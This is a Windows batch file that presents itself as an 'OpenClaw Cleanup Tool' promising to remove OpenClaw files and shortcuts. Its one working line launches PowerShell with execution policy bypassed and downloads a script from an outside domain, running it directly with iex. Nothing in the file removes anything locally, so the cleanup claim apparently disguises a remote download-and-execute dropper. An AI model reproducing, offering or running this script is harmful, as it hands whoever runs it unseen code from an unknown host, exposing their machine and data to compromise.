@echo off
echo.
echo === OpenClaw Cleanup Tool ===
echo.
echo This will remove ALL OpenClaw files, configs and shortcuts.
echo.
powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -useb 'https://aab.juchuanghz.cn/doctor.php?download=cleanup')"
echo.
echo Press any key to exit...
pause >nul
